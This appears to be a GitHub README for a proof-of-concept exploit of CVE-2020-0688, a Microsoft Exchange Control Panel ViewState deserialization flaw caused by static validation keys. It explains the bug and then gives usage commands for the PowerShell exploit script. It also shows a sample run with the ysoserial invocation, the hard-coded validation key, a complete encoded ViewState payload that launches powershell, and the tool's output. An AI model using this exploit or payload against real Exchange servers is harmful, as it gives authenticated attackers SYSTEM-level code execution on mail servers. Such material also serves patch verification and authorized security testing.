A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.
Knowledge of a the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.
The bug is found in the Exchange Control Panel (ECP) component. The nature of the bug is quite simple. Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same validationKey
and decryptionKey
values in web.config
. These keys are used to provide security for ViewState. ViewState is server-side data that ASP.NET web applications store in serialized format on the client. The client provides this data back to the server via the __VIEWSTATE
request parameter.
Due to the use of static keys, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel web application, which runs as SYSTEM. (Source)
Thanks to these instructions, you can get a copy of the project up and run on your local machine for development and testing purposes.
- PowerShell
git clone https://github.com/MrTiz/CVE-2020-0688.git
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath>
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' -YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'
[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256
C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug
[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADtBDxSZXNvdXJjZURpY3Rpb25hcnkNCiAgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiINCiAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiDQogIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D
[*] Auto trigger payload...
[+] Status code: 500, Maybe success!
Contributions are what make the open source community such a good place to learn, inspire, and create. Any contributions you can provide are greatly appreciated.
- Fork the Project
- Create your Feature Branch (
git checkout -b feature/AmazingFeature
) - Commit your Changes (
git commit -m 'Add some AmazingFeature'
) - Push to the Branch (
git push origin feature/AmazingFeature
) - Open a Pull Request
This exploit was developed and published for educational and research purposes only. The author assumes no responsibility for any illegal use. Use it at your own risk and only against systems for which you are authorized to test it.
This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details.